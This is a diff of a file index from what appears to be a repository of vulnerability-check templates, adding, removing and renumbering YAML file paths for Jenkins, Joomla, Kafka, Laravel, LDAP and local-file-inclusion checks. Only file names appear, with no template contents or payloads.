@@ -49152,9 +49128,9 @@ ./poc/javascript/ojs-unauthenticated-open-redirect.yaml ./poc/javascript/package-json-1.yaml ./poc/javascript/package-json-2.yaml +./poc/javascript/package-json-9421.yaml ./poc/javascript/package-json-9422.yaml ./poc/javascript/package-json-9423.yaml -./poc/javascript/package-json.yaml ./poc/javascript/pdfjs-viewer-shortcode-901f07b1c8adb20b4d89c03c0e4b0f6e.yaml ./poc/javascript/pdfjs-viewer-shortcode-9f8b34f5ac9a5f3aa8eca1410ed341dd.yaml ./poc/javascript/pdfjs-viewer-shortcode-a8f0b32d7cfb6af435cac07ab61c5de1.yaml @@ -49191,7 +49167,7 @@ ./poc/javascript/wanhu-ezoffice-smartupload-jsp-fileupload.yaml ./poc/javascript/wanhu-ezoffice-upload-jsp-fileupload.yaml ./poc/javascript/webview-addjavascript-interface-11175.yaml -./poc/javascript/webview-addjavascript-interface-11177.yaml +./poc/javascript/webview-addjavascript-interface-11176.yaml ./poc/javascript/webview-addjavascript-interface.yaml ./poc/javascript/webview-javascript-11178.yaml ./poc/javascript/webview-javascript.yaml 
@@ -49236,26 +49212,27 @@ ./poc/jenkins/jenkins-cve-2018-1000861-rce.yml ./poc/jenkins/jenkins-default-8270.yaml ./poc/jenkins/jenkins-default-8271.yaml +./poc/jenkins/jenkins-default-8272.yaml ./poc/jenkins/jenkins-default-8273.yaml ./poc/jenkins/jenkins-default-login.yaml ./poc/jenkins/jenkins-default-pwd.yaml -./poc/jenkins/jenkins-default.yaml ./poc/jenkins/jenkins-detect-8274.yaml -./poc/jenkins/jenkins-detect-8275.yaml +./poc/jenkins/jenkins-detect-8276.yaml ./poc/jenkins/jenkins-detect.yaml ./poc/jenkins/jenkins-exposed.yaml ./poc/jenkins/jenkins-headers-detect.yaml ./poc/jenkins/jenkins-home-dir-exposure.yaml -./poc/jenkins/jenkins-login-8277.yaml ./poc/jenkins/jenkins-login-8278.yaml ./poc/jenkins/jenkins-login-8279.yaml +./poc/jenkins/jenkins-login-8280.yaml ./poc/jenkins/jenkins-login-detection.yaml ./poc/jenkins/jenkins-login.yaml ./poc/jenkins/jenkins-rce.yaml ./poc/jenkins/jenkins-script-8281.yaml ./poc/jenkins/jenkins-script-8282.yaml ./poc/jenkins/jenkins-script-8283.yaml -./poc/jenkins/jenkins-script-8284.yaml +./poc/jenkins/jenkins-script.yaml +./poc/jenkins/jenkins-stack-trace-8285.yaml ./poc/jenkins/jenkins-stack-trace-8286.yaml ./poc/jenkins/jenkins-stack-trace-8287.yaml ./poc/jenkins/jenkins-stack-trace-8288.yaml @@ -49301,9 +49278,9 @@ ./poc/joomla/freejoomlas.yaml ./poc/joomla/joomla-cnvd-2019-34135-rce.yml ./poc/joomla/joomla-com-fabrik-lfi-8370.yaml -./poc/joomla/joomla-com-fabrik-lfi-8371.yaml ./poc/joomla/joomla-com-fabrik-lfi-8372.yaml ./poc/joomla/joomla-com-fabrik-lfi-8373.yaml +./poc/joomla/joomla-com-fabrik-lfi.yaml ./poc/joomla/joomla-component-vreview-sql.yaml ./poc/joomla/joomla-component-vreview-sql.yml ./poc/joomla/joomla-config-dist-file.yaml 
@@ -49317,7 +49294,7 @@ ./poc/joomla/joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml ./poc/joomla/joomla-file-listing-8378.yaml ./poc/joomla/joomla-file-listing-8379.yaml -./poc/joomla/joomla-file-listing.yaml +./poc/joomla/joomla-file-listing-8380.yaml ./poc/joomla/joomla-host-injection.yaml ./poc/joomla/joomla-htaccess-8381.yaml ./poc/joomla/joomla-htaccess-8382.yaml @@ -49331,8 +49308,8 @@ ./poc/joomla/joomla-manifest-file-8387.yaml ./poc/joomla/joomla-manifest-file-8388.yaml ./poc/joomla/joomla-manifest-file.yaml +./poc/joomla/joomla-panel-8389.yaml ./poc/joomla/joomla-panel-8390.yaml -./poc/joomla/joomla-panel-8391.yaml ./poc/joomla/joomla-panel-8392.yaml ./poc/joomla/joomla-panel.yaml ./poc/joomla/joomla-sensitive-config.yaml @@ -49351,13 +49328,14 @@ ./poc/joomla/joomla-version.yaml ./poc/joomla/joomla-workflow-8393.yaml ./poc/joomla/joomla-workflow-8394.yaml -./poc/joomla/joomla-workflow.yaml ./poc/joomla/joomla.yaml ./poc/joomla/rusty-joomla-9955.yaml +./poc/joomla/rusty-joomla.yaml ./poc/kafka/apache-druid-kafka-connect-rce.yaml ./poc/kafka/kafka-center-default-login-8415.yaml ./poc/kafka/kafka-center-default-login-8416.yaml ./poc/kafka/kafka-center-default-login-8417.yaml +./poc/kafka/kafka-center-default-login.yaml ./poc/kafka/kafka-center-default-password.yaml ./poc/kafka/kafka-center-login-8419.yaml ./poc/kafka/kafka-center-login.yaml @@ -49366,7 +49344,7 @@ ./poc/kafka/kafka-connect-ui-8422.yaml ./poc/kafka/kafka-connect-ui-8423.yaml ./poc/kafka/kafka-connect-ui.yaml -./poc/kafka/kafka-consumer-monitor-8425.yaml +./poc/kafka/kafka-consumer-monitor-8424.yaml ./poc/kafka/kafka-consumer-monitor.yaml ./poc/kafka/kafka-cruise-control-8426.yaml ./poc/kafka/kafka-cruise-control-8427.yaml 
@@ -49374,9 +49352,9 @@ ./poc/kafka/kafka-manager-unauth.yml ./poc/kafka/kafka-manager.yaml ./poc/kafka/kafka-misconfig.yaml +./poc/kafka/kafka-monitoring-8428.yaml ./poc/kafka/kafka-monitoring-8429.yaml ./poc/kafka/kafka-monitoring-8430.yaml -./poc/kafka/kafka-monitoring-8431.yaml ./poc/kafka/kafka-monitoring.yaml ./poc/kafka/kafka-topics-list.yaml ./poc/kafka/kafka-topics-ui-8432.yaml @@ -49409,10 +49387,8 @@ ./poc/laravel/laravel-cve-2021-3129.yml ./poc/laravel/laravel-debug-enabled-8574.yaml ./poc/laravel/laravel-debug-enabled-8575.yaml -./poc/laravel/laravel-debug-enabled-8576.yaml ./poc/laravel/laravel-debug-enabled-8577.yaml ./poc/laravel/laravel-debug-enabled-8578.yaml -./poc/laravel/laravel-debug-enabled.yaml ./poc/laravel/laravel-debug-error-8579.yaml ./poc/laravel/laravel-debug-error.yaml ./poc/laravel/laravel-debug-info-leak.yaml @@ -49422,6 +49398,7 @@ ./poc/laravel/laravel-detect.yaml ./poc/laravel/laravel-env-8580.yaml ./poc/laravel/laravel-env-8581.yaml +./poc/laravel/laravel-env-8582.yaml ./poc/laravel/laravel-env-8583.yaml ./poc/laravel/laravel-env-8584.yaml ./poc/laravel/laravel-env-8585.yaml @@ -49436,11 +49413,11 @@ ./poc/laravel/laravel-framework.yaml ./poc/laravel/laravel-ignition-xss-8592.yaml ./poc/laravel/laravel-ignition-xss-8593.yaml +./poc/laravel/laravel-ignition-xss.yaml ./poc/laravel/laravel-improper-webdir.yaml ./poc/laravel/laravel-improper-webdir.yml ./poc/laravel/laravel-log-file-8594.yaml ./poc/laravel/laravel-log-file-8595.yaml -./poc/laravel/laravel-log-file-8596.yaml ./poc/laravel/laravel-log-file-8597.yaml ./poc/laravel/laravel-log-file-8598.yaml ./poc/laravel/laravel-telescope-8599.yaml @@ -49484,6 +49461,7 @@ ./poc/ldap/ldap-wp-login-integration-with-active-directory.yaml ./poc/ldap/ldap-wp-login-xss.yaml ./poc/ldap/phpldap-admin.yaml +./poc/ldap/phpldapadmin-panel.yaml ./poc/ldap/phpldapadmin-xss.yaml ./poc/ldap/phpldapadmin.yaml ./poc/ldap/teampass-ldap.yaml 
@@ -49509,48 +49487,42 @@ ./poc/local_file_inclusion/Wordpress-jQuery_Mega_Menu_Plugins-LFI.yaml ./poc/local_file_inclusion/accent-microcomputers-lfi-14.yaml ./poc/local_file_inclusion/accent-microcomputers-lfi-15.yaml -./poc/local_file_inclusion/accent-microcomputers-lfi-17.yaml -./poc/local_file_inclusion/ad-widget-lfi-124.yaml +./poc/local_file_inclusion/accent-microcomputers-lfi-16.yaml ./poc/local_file_inclusion/ad-widget-lfi-125.yaml ./poc/local_file_inclusion/ad-widget-lfi-126.yaml +./poc/local_file_inclusion/admin-word-count-column-lfi-81.yaml ./poc/local_file_inclusion/admin-word-count-column-lfi.yaml +./poc/local_file_inclusion/advanced-access-manager-lfi-116.yaml ./poc/local_file_inclusion/advanced-access-manager-lfi-117.yaml -./poc/local_file_inclusion/advanced-access-manager-lfi-118.yaml -./poc/local_file_inclusion/advanced-access-manager-lfi.yaml ./poc/local_file_inclusion/advanced-access-manager-plugin-lfi.yaml ./poc/local_file_inclusion/alertlist-lfi.yaml ./poc/local_file_inclusion/alibaba-anyproxy-lfi.yaml ./poc/local_file_inclusion/amministrazione-aperta-lfi.yaml ./poc/local_file_inclusion/apachesolrlfissrf.yaml ./poc/local_file_inclusion/asanhamayesh-cms-lfi.yaml -./poc/local_file_inclusion/asanhamayesh-lfi-552.yaml +./poc/local_file_inclusion/asanhamayesh-lfi-553.yaml ./poc/local_file_inclusion/asanhamayesh-lfi.yaml ./poc/local_file_inclusion/bems-api-lfi-707.yaml ./poc/local_file_inclusion/bems-api-lfi-708.yaml -./poc/local_file_inclusion/bems-api-lfi-709.yaml ./poc/local_file_inclusion/bems-api-lfi-710.yaml ./poc/local_file_inclusion/bems-api-lfi-711.yaml -./poc/local_file_inclusion/bems-api-lfi-712.yaml ./poc/local_file_inclusion/blue-ocean-excellence-lfi-755.yaml -./poc/local_file_inclusion/blue-ocean-excellence-lfi-756.yaml ./poc/local_file_inclusion/blue-ocean-excellence-lfi-757.yaml ./poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml ./poc/local_file_inclusion/brandfolder-lfi-777.yaml 
./poc/local_file_inclusion/brandfolder-lfi-778.yaml -./poc/local_file_inclusion/brandfolder-lfi.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-804.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-805.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-806.yaml -./poc/local_file_inclusion/bullwark-momentum-lfi-807.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml ./poc/local_file_inclusion/cab-fare-calculator-lfi-819.yaml ./poc/local_file_inclusion/cab-fare-calculator-lfi.yaml ./poc/local_file_inclusion/candidate-application-lfi.yaml ./poc/local_file_inclusion/cherry-lfi-902.yaml +./poc/local_file_inclusion/cherry-lfi-903.yaml ./poc/local_file_inclusion/church-admin-lfi-912.yaml ./poc/local_file_inclusion/church-admin-lfi-913.yaml ./poc/local_file_inclusion/churchope-lfi-915.yaml -./poc/local_file_inclusion/churchope-lfi.yaml ./poc/local_file_inclusion/coldfusion-cve-2010-2861-lfi.yml ./poc/local_file_inclusion/comfyui-lfi.yaml ./poc/local_file_inclusion/confluence-cve-2019-3396-lfi.yaml 
@@ -49560,15 +49532,15 @@ ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1281.yaml ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1282.yaml ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1283.yaml -./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1285.yaml +./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1284.yaml +./poc/local_file_inclusion/cs-cart-unauthenticated-lfi.yaml ./poc/local_file_inclusion/dahua-icc-readPic-lfi.yaml -./poc/local_file_inclusion/db-backup-lfi-6774.yaml +./poc/local_file_inclusion/db-backup-lfi-6775.yaml ./poc/local_file_inclusion/db-backup-lfi-6776.yaml ./poc/local_file_inclusion/db-backup-lfi.yaml ./poc/local_file_inclusion/diarise-theme-lfi-6990.yaml ./poc/local_file_inclusion/diarise-theme-lfi-6991.yaml ./poc/local_file_inclusion/diarise-theme-lfi-6992.yaml -./poc/local_file_inclusion/diarise-theme-lfi.yaml ./poc/local_file_inclusion/dicoogle-pacs-lfi-6993.yaml ./poc/local_file_inclusion/dicoogle-pacs-lfi-6994.yaml ./poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml 
@@ -49580,17 +49552,15 @@ ./poc/local_file_inclusion/eibiz-lfi-7186.yaml ./poc/local_file_inclusion/eibiz-lfi-7187.yaml ./poc/local_file_inclusion/eibiz-server-3-8-0-lfi.yaml -./poc/local_file_inclusion/elFinder-path-traversal.yaml ./poc/local_file_inclusion/elasticsearch-cve-2015-3337-lfi.yml ./poc/local_file_inclusion/elfinder-detect-1.yaml ./poc/local_file_inclusion/elfinder-detect-2.yaml ./poc/local_file_inclusion/elfinder-detect-7201.yaml ./poc/local_file_inclusion/elfinder-detect-7202.yaml -./poc/local_file_inclusion/elfinder-path-traversal-7203.yaml +./poc/local_file_inclusion/elfinder-path-traversal.yaml ./poc/local_file_inclusion/elfinder-rce.yaml ./poc/local_file_inclusion/elfinder-version-7204.yaml ./poc/local_file_inclusion/elfinder-version-7205.yaml -./poc/local_file_inclusion/elfinder-version.yaml ./poc/local_file_inclusion/ewebs-lfi.yaml ./poc/local_file_inclusion/fhem-6-unauthenticated-lfi.yaml ./poc/local_file_inclusion/flink-jobmanager-cve-2020-17519-lfi.yml @@ -49601,6 +49571,7 @@ ./poc/local_file_inclusion/generic-linux-lfi-7589.yaml ./poc/local_file_inclusion/generic-linux-lfi.yaml ./poc/local_file_inclusion/generic-windows-lfi-7590.yaml +./poc/local_file_inclusion/generic-windows-lfi-7591.yaml ./poc/local_file_inclusion/generic-windows-lfi-7592.yaml ./poc/local_file_inclusion/generic-windows-lfi.yaml ./poc/local_file_inclusion/geovision-geowebserver-lfi-1.yaml 
@@ -49612,17 +49583,20 @@ ./poc/local_file_inclusion/global-domains-lfi-7714.yaml ./poc/local_file_inclusion/global-domains-lfi-7715.yaml ./poc/local_file_inclusion/global-domains-lfi-7716.yaml +./poc/local_file_inclusion/global-domains-lfi.yaml ./poc/local_file_inclusion/goip-1-lfi-7761.yaml ./poc/local_file_inclusion/goip-1-lfi-7762.yaml ./poc/local_file_inclusion/goip-1-lfi-7763.yaml -./poc/local_file_inclusion/goip-1-lfi-7764.yaml +./poc/local_file_inclusion/groupoffice-lfi-7849.yaml ./poc/local_file_inclusion/groupoffice-lfi-7850.yaml ./poc/local_file_inclusion/groupoffice-lfi-7851.yaml +./poc/local_file_inclusion/groupoffice-lfi.yaml ./poc/local_file_inclusion/gsoap-lfi-7853.yaml ./poc/local_file_inclusion/gsoap-lfi-7854.yaml ./poc/local_file_inclusion/gsoap-lfi-7855.yaml ./poc/local_file_inclusion/gsoap-lfi-7856.yaml ./poc/local_file_inclusion/gsoap-lfi-7857.yaml +./poc/local_file_inclusion/gsoap-lfi.yaml ./poc/local_file_inclusion/hb-audio-lfi-7911.yaml ./poc/local_file_inclusion/hb-audio-lfi-7912.yaml ./poc/local_file_inclusion/hb-audio-lfi-7913.yaml @@ -49631,7 +49605,6 @@ ./poc/local_file_inclusion/hide-security-enhancer-lfi-7951.yaml ./poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml ./poc/local_file_inclusion/hide-security-enhancer-lfi-7953.yaml -./poc/local_file_inclusion/hide-security-enhancer-lfi.yaml ./poc/local_file_inclusion/hikvision-orgs-download-lfi.yaml ./poc/local_file_inclusion/hjsoft-eHR-outputcode-lfi.yaml ./poc/local_file_inclusion/hrsale-unauthenticated-lfi-8039.yaml 
@@ -49639,13 +49612,11 @@ ./poc/local_file_inclusion/hrsale-unauthenticated-lfi-8041.yaml ./poc/local_file_inclusion/huawei-firewall-lfi.yaml ./poc/local_file_inclusion/huawei-hg255s-lfi-8059.yaml -./poc/local_file_inclusion/huawei-hg255s-lfi-8060.yaml ./poc/local_file_inclusion/huawei-hg255s-lfi-8061.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8068.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8069.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8070.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8071.yaml -./poc/local_file_inclusion/huawei-hg659-lfi.yaml ./poc/local_file_inclusion/ibm-infoprint-lfi-8101.yaml ./poc/local_file_inclusion/ibm-infoprint-lfi-8102.yaml ./poc/local_file_inclusion/ibm-infoprint-lfi-8103.yaml 
@@ -49656,24 +49627,25 @@ ./poc/local_file_inclusion/issuu-panel-lfi-8198.yaml ./poc/local_file_inclusion/issuu-panel-lfi-8199.yaml ./poc/local_file_inclusion/issuu-panel-lfi-8200.yaml +./poc/local_file_inclusion/issuu-panel-lfi.yaml ./poc/local_file_inclusion/jeewms-lfi-1.yaml ./poc/local_file_inclusion/jeewms-lfi-2.yaml ./poc/local_file_inclusion/jeewms-lfi-8252.yaml ./poc/local_file_inclusion/jeewms-lfi-8253.yaml ./poc/local_file_inclusion/jeewms-lfi-8254.yaml ./poc/local_file_inclusion/jeewms-lfi-8255.yaml -./poc/local_file_inclusion/jeewms-lfi.yaml -./poc/local_file_inclusion/jinfornet-jreport-lfi-8308.yaml +./poc/local_file_inclusion/jinfornet-jreport-lfi-8307.yaml ./poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml ./poc/local_file_inclusion/jinfornet-jreport-lfi-8310.yaml ./poc/local_file_inclusion/jinfornet-jreport-lfi.yaml ./poc/local_file_inclusion/jinhe-oa-c6-filedownload-lfi.yaml -./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8364.yaml ./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8365.yaml +./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8366.yaml +./poc/local_file_inclusion/jolokia-unauthenticated-lfi.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8370.yaml -./poc/local_file_inclusion/joomla-com-fabrik-lfi-8371.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8372.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8373.yaml +./poc/local_file_inclusion/joomla-com-fabrik-lfi.yaml ./poc/local_file_inclusion/joomla-lfi-comfabrik.yaml ./poc/local_file_inclusion/karel-ip-phone-lfi-8436.yaml ./poc/local_file_inclusion/karel-ip-phone-lfi-8437.yaml @@ -49698,6 +49670,7 @@ ./poc/local_file_inclusion/lfi-fuzz.yaml ./poc/local_file_inclusion/lfi-j2ee.yaml ./poc/local_file_inclusion/lfi-keyed.yaml +./poc/local_file_inclusion/lfi-linux-fuzz.yaml ./poc/local_file_inclusion/lfi-linux.yaml ./poc/local_file_inclusion/lfi-vuln-params.yaml ./poc/local_file_inclusion/lfi-windows.yaml 
@@ -49719,13 +49692,13 @@ ./poc/local_file_inclusion/metinfo-lfi-8839.yaml ./poc/local_file_inclusion/metinfo-lfi-8840.yaml ./poc/local_file_inclusion/metinfo-lfi-cnvd-2018-13393.yml +./poc/local_file_inclusion/minimouse-lfi-8877.yaml ./poc/local_file_inclusion/minimouse-lfi-8878.yaml ./poc/local_file_inclusion/minimouse-lfi-8879.yaml ./poc/local_file_inclusion/minimouse-lfi-8880.yaml ./poc/local_file_inclusion/minimouse-lfi-8881.yaml ./poc/local_file_inclusion/minimouse-lfi.yaml ./poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml -./poc/local_file_inclusion/moodle-filter-jmol-lfi-8938.yaml ./poc/local_file_inclusion/moodle-filter-jmol-lfi-8939.yaml ./poc/local_file_inclusion/moodle-filter-jmol-lfi-8940.yaml ./poc/local_file_inclusion/moodle-filter-jmol-lfi-8941.yaml @@ -49736,7 +49709,6 @@ ./poc/local_file_inclusion/mpsec-lfi-8955.yaml ./poc/local_file_inclusion/mpsec-lfi-8956.yaml ./poc/local_file_inclusion/mpsec-lfi-8957.yaml -./poc/local_file_inclusion/mpsec-lfi.yaml ./poc/local_file_inclusion/mthemeunus-lfi-8970.yaml ./poc/local_file_inclusion/mthemeunus-lfi-8971.yaml ./poc/local_file_inclusion/mthemeunus-lfi.yaml 
@@ -49746,30 +49718,28 @@ ./poc/local_file_inclusion/oliver-library-lfi-9241.yaml ./poc/local_file_inclusion/omnia-mpx-lfi.yaml ./poc/local_file_inclusion/opencti-lfi-9267.yaml -./poc/local_file_inclusion/opencti-lfi-9268.yaml ./poc/local_file_inclusion/opensis-lfi-1.yaml ./poc/local_file_inclusion/opensis-lfi-2.yaml ./poc/local_file_inclusion/opensis-lfi-9315.yaml ./poc/local_file_inclusion/opensis-lfi-9316.yaml ./poc/local_file_inclusion/opensis-lfi-9317.yaml -./poc/local_file_inclusion/opensis-lfi.yaml ./poc/local_file_inclusion/oracle-ebs-lfi.yaml ./poc/local_file_inclusion/oracle-fatwire-lfi-9378.yaml ./poc/local_file_inclusion/oracle-fatwire-lfi-9379.yaml ./poc/local_file_inclusion/oracle-fatwire-lfi-9380.yaml +./poc/local_file_inclusion/orbiteam-bscw-server-lfi-9404.yaml ./poc/local_file_inclusion/orbiteam-bscw-server-lfi.yaml ./poc/local_file_inclusion/orbiteam-bscw-server-unauthenticated-lfi.yaml ./poc/local_file_inclusion/ov3-online-administration-unauthenticated-lfi.yaml ./poc/local_file_inclusion/pacsone-server-6-6-2-lfi.yaml +./poc/local_file_inclusion/pacsone-server-lfi-9428.yaml ./poc/local_file_inclusion/pacsone-server-lfi-9429.yaml ./poc/local_file_inclusion/pacsone-server-lfi-9430.yaml -./poc/local_file_inclusion/pacsone-server-lfi.yaml ./poc/local_file_inclusion/phpwiki-lfi-9564.yaml ./poc/local_file_inclusion/phpwiki-lfi-9565.yaml ./poc/local_file_inclusion/phpwiki-lfi-9566.yaml ./poc/local_file_inclusion/phpwiki-lfi-9567.yaml ./poc/local_file_inclusion/phpwiki-lfi-9568.yaml -./poc/local_file_inclusion/pikpikculfi.yaml ./poc/local_file_inclusion/process-maker-lfi.yaml ./poc/local_file_inclusion/processmaker-lfi-9659.yaml ./poc/local_file_inclusion/processmaker-lfi-9660.yaml 
@@ -49778,19 +49748,19 @@ ./poc/local_file_inclusion/qihang-media-lfi-9766.yaml ./poc/local_file_inclusion/qihang-media-lfi-9767.yaml ./poc/local_file_inclusion/qihang-media-lfi-9768.yaml -./poc/local_file_inclusion/qihang-media-lfi-9769.yaml +./poc/local_file_inclusion/qihang-media-lfi.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9938.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9939.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9941.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9942.yaml ./poc/local_file_inclusion/ruoyi-management-lfi.yaml +./poc/local_file_inclusion/samsung-wlan-ap-lfi-10000.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-10001.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-10002.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-10003.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-9997.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-9998.yaml -./poc/local_file_inclusion/samsung-wlan-ap-lfi-9999.yaml ./poc/local_file_inclusion/schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml ./poc/local_file_inclusion/selea-targa-camera-lfi.yaml ./poc/local_file_inclusion/shopxolfi.yaml @@ -49798,6 +49768,7 @@ ./poc/local_file_inclusion/shortcode-lfi-10215.yaml ./poc/local_file_inclusion/shortcode-lfi-10216.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi-10281.yaml +./poc/local_file_inclusion/simple-image-manipulator-lfi-10282.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi.yaml ./poc/local_file_inclusion/sitecore-lfi.yaml 
@@ -49805,12 +49776,14 @@ ./poc/local_file_inclusion/sl-studio-lfi-10319.yaml ./poc/local_file_inclusion/sl-studio-lfi-10320.yaml ./poc/local_file_inclusion/sl-studio-lfi-10321.yaml +./poc/local_file_inclusion/sl-studio-lfi.yaml ./poc/local_file_inclusion/sniplets-lfi-10341.yaml ./poc/local_file_inclusion/sniplets-lfi-10342.yaml ./poc/local_file_inclusion/sniplets-lfi-10343.yaml ./poc/local_file_inclusion/sniplets-lfi.yaml ./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml ./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10351.yaml +./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi.yaml ./poc/local_file_inclusion/sofneta-mecdream-pacs-server-lfi.yaml ./poc/local_file_inclusion/squirrelmail-lfi-10516.yaml ./poc/local_file_inclusion/squirrelmail-lfi-10517.yaml 
@@ -49823,44 +49796,45 @@ ./poc/local_file_inclusion/targa-camera-lfi-10655.yaml ./poc/local_file_inclusion/thinkcmf-lfi (copy 1).yaml ./poc/local_file_inclusion/thinkcmf-lfi-1.yaml +./poc/local_file_inclusion/thinkcmf-lfi-10721.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10722.yaml -./poc/local_file_inclusion/thinkcmf-lfi-10723.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10724.yaml ./poc/local_file_inclusion/thinkcmf-lfi-2.yaml ./poc/local_file_inclusion/thinkcmf-lfi.yml ./poc/local_file_inclusion/thinkcmflfi.yaml ./poc/local_file_inclusion/thinkphp6-lang-lfi.yaml ./poc/local_file_inclusion/video-synchro-pdf-lfi-11006.yaml +./poc/local_file_inclusion/video-synchro-pdf-lfi-11007.yaml ./poc/local_file_inclusion/video-synchro-pdf-lfi.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-1.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-11046.yaml -./poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-11048.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-2.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-3.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11042.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11043.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11045.yaml +./poc/local_file_inclusion/vmware-vcenter-lfi.yaml ./poc/local_file_inclusion/windows-lfi-fuzz.yaml ./poc/local_file_inclusion/wordpress-LFI.yaml ./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yaml ./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yml -./poc/local_file_inclusion/wordpress-lfi.yaml +./poc/local_file_inclusion/wordpress-wordfence-lfi-11346.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11347.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11348.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11349.yaml -./poc/local_file_inclusion/wordpress-wordfence-lfi-11350.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml 
./poc/local_file_inclusion/wordpress-wordfence-lfi-11352.yaml ./poc/local_file_inclusion/wp-brandfolder-plugin-lfi.yaml ./poc/local_file_inclusion/wp-church-admin-lfi.yaml ./poc/local_file_inclusion/wp-javospot-lfi-11480.yaml ./poc/local_file_inclusion/wp-javospot-lfi-11481.yaml -./poc/local_file_inclusion/wp-javospot-lfi.yaml +./poc/local_file_inclusion/wp-javospot-lfi-11482.yaml ./poc/local_file_inclusion/wp-javospot-premium-theme-lfi.yaml ./poc/local_file_inclusion/wp-localize-post-lfi.yaml ./poc/local_file_inclusion/wp-mail-masta-lfi.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-1.yaml +./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11495.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11496.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11497.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11498.yaml @@ -49878,7 +49852,6 @@ ./poc/local_file_inclusion/wp-simple-fields-lfi-11566.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11567.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11568.yaml -./poc/local_file_inclusion/wp-simple-fields-lfi-11569.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11570.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml ./poc/local_file_inclusion/wp-site-editor-lfi.yaml @@ -49900,8 +49873,8 @@ ./poc/local_file_inclusion/wp-tutor-lfi-11597.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11598.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11599.yaml -./poc/local_file_inclusion/wp-tutor-lfi-11600.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11601.yaml +./poc/local_file_inclusion/wp-tutor-lfi.yaml ./poc/local_file_inclusion/wp-vault-lfi(1).yaml ./poc/local_file_inclusion/wp-vault-lfi-11606.yaml ./poc/local_file_inclusion/wp-vault-lfi-11607.yaml 
@@ -49914,6 +49887,7 @@ ./poc/local_file_inclusion/xerox-efi-lfi-11681.yaml ./poc/local_file_inclusion/xerox-efi-lfi-11682.yaml ./poc/local_file_inclusion/xerox-efi-lfi-11683.yaml +./poc/local_file_inclusion/xerox-efi-lfi.yaml ./poc/local_file_inclusion/xmlrpcservlet_lfi.yaml ./poc/local_file_inclusion/xxe_lfi.yaml ./poc/local_file_inclusion/yisaitong-downloadfromfile-lfi.yaml @@ -49921,6 +49895,7 @@ ./poc/local_file_inclusion/yishaadmin-lfi-11742.yaml ./poc/local_file_inclusion/yishaadmin-lfi-11743.yaml ./poc/local_file_inclusion/yishaadmin-lfi-11744.yaml +./poc/local_file_inclusion/yishaadmin-lfi.yaml ./poc/local_file_inclusion/yonyou-nc-printbill-lfi.yaml ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-2fe6949ea942d8a3b7779bc5ccf17f38.yaml ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-d55b65118444e2b38ff7422e4f9db780.yaml @@ -49932,9 +49907,10 